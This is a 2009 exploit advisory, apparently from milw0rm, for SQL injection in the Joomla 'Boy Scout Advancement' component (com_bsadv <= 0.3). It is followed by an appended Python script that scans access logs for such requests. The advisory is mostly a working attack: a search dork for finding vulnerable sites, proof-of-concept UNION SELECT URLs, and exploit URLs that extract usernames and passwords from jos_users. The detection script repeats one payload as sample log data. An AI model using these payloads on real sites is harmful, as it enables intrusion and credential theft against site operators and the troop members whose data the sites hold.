Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit

					                       Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                            Page 1/3
  1    ***********************************************************************************************
  2    ***********************************************************************************************
  3    **                                                                                           **
  4    **                                                                                           **
  5    **     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
  6    **     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
  7    ** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
  8    ** [−−−−−[]−−−−−[][][][>−−[]−−[]−[]−−−[][][]−−[]−[]−−[]−−−−−−−−[]−−−−−[][][][>−−[][][][]−−−\
  9    **==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>−−
  10   ** [−−−−[[]]−−−−[]−−− −−−−[]−−−−−[]−−−[]−−[]−−−−−[]−−[]−−−−−−−[] []−−−[]−−−−−−−−−−[]−−[]−−−/
  11      [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
  12   **                                                                                           **
  13   **                                                                                           **
  14   **                         VIVA SPAIN!...WE WILL WIN THE WORLD CUP!...o.O                     **
  15   **                                      ¡PROUD TO BE SPANISH!                               **
  16   **                                                                                           **
  17   ***********************************************************************************************
  18   ***********************************************************************************************
  19
  20   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  21   |                                MULTIPLE SQL INJECTION VULNERABILITIES                      |
  22   |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|
  23   |                   | Joomla Component ’Boy Scout Advancement’ <= v−0.3 (com_bsadv) |        |
  24   |CMS INFORMATION:    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−         |
  25   |                                                                                            |
  26   |−−>WEB: http://bsadv.sourceforge.net/                                                       |
  27   |−−>DOWNLOAD: http://bsadv.sourceforge.net/                                                  |
  28   |−−>DEMO: N/A                                                                                |
  29   |−−>CATEGORY: Joomla/Component                                                               |
  30   |−−>DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement     |
  31   |               data for Boy Scout Troops in the United States...                            |
  32   |−−>RELEASED: 2009−02−01                                                                     |
  33   |                                                                                            |
  34   |CMS VULNERABILITY:                                                                          |
  35   |                                                                                            |
  36   |−−>TESTED ON: firefox 3                                                                     |
  37   |−−>DORK −−> inurl:"?option=com_bsadv"                                                       |
  38   |−−>CATEGORY: SQL INJECTION                                                                  |
  39   |−−>AFFECT VERSION: <= 0.3                                                                   |
  40   |−−>Discovered Bug date: 2009−05−25                                                          |
  41   |−−>Reported Bug date: 2009−05−25                                                            |
  42   |−−>Fixed bug date: Not fixed                                                                |
  43   |−−>Info patch: Not fixed                                                                    |
  44   |−−>Author: YEnH4ckEr                                                                        |
  45   |−−>mail: y3nh4ck3r[at]gmail[dot]com                                                         |
  46   |−−>WEB/BLOG: N/A                                                                            |
  47   |−−>COMMENT: To my girlfriend Marijose...brother, sister-in-law, parents (and friends xD) for their support. |
  48   |−−>EXTRA−COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)      |
  49   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  50
  51
  52   ############################
YEnH4ckEr                                                                                                   05/26/2009
  53    ///////////////////////////
  54
  55    SQL INJECTION VULNS (SQLi):
  56
  57    ///////////////////////////
  58    ############################
  59
  60
  61
  62    <<<<−−−−−−−−−++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++−−−−−−−−−>>>>
  63
  64
  65
  66    −−−−−−−−−−−−−−−−−−−
  67    PROOFS OF CONCEPT:
  68    −−−−−−−−−−−−−−−−−−−
  69
  70
  71
  72    [++] GET var −−> ’id’
  73
  74
  75    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,version(),database(),user()%23
  76
  77
  78    [++] GET var −−> ’id’
  79
  80
  81    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+database(),version()%23&Itemid=57
  82
  83
  84
  85    [++[Return]++] ~~~~~> User, version or database.
  86
  87
  88
  89    −−−−−−−−−−−
  90    EXPLOITS:
  91    −−−−−−−−−−−
  92
  93
  94
  95    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23
  96
  97
  98
  99    [++[Return]++] ~~~~~> Username:::password id=62
  100
  101

  102
  103   ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57
  104
  105
  106
  107   [++[Return]++] ~~~~~> Username and password id=62
  108
  109
  110
  111
  112   <<<−−−−−−−−−−−−−−−−−−−−−−−−−−−−−EOF−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−>>>ENJOY IT!
  113
  114
  115
  116   #######################################################################
  117   #######################################################################
  118   ##*******************************************************************##
  119   ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
  120   ##*******************************************************************##
  121   ##−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−##
  122   ##*******************************************************************##
  123   ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
  124   ##*******************************************************************##
  125   #######################################################################
  126   #######################################################################
  127
  128   # milw0rm.com [2009−05−26]
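
Added example, not part of the original advisory: a log check for the condition described above, where the 'id' GET variable of com_bsadv carries anything other than a record number. The function names, the combined access-log format, the integer-only rule for 'id' and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate record id is a plain non-negative integer.
PLAIN_INT_RE = re.compile(r"\d+")


def suspicious_bsadv_id(log_line):
    """Return the decoded id value when the line is a com_bsadv request whose
    id parameter is not a plain integer; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs URL-decodes the values, so %23 and '+' are seen as '#' and ' '.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if params.get("option", [""])[-1].lower() != "com_bsadv":
        return None
    # Check every id value: a repeated parameter must not hide a bad one.
    for value in params.get("id", []):
        if not PLAIN_INT_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_id) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_bsadv_id(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/May/2009:10:00:01 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/May/2009:10:00:07 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23 HTTP/1.1" 200 4988',
    '192.0.2.44 - - [26/May/2009:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5:about HTTP/1.1" 200 7301',
    '192.0.2.10 - - [26/May/2009:10:00:12 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=account&id=7&Itemid=57 HTTP/1.1" 200 6210',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer id -> {value!r}")
```

The same integer-only rule is the server-side fix: casting 'id' to an integer before it reaches the query leaves nothing to inject.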



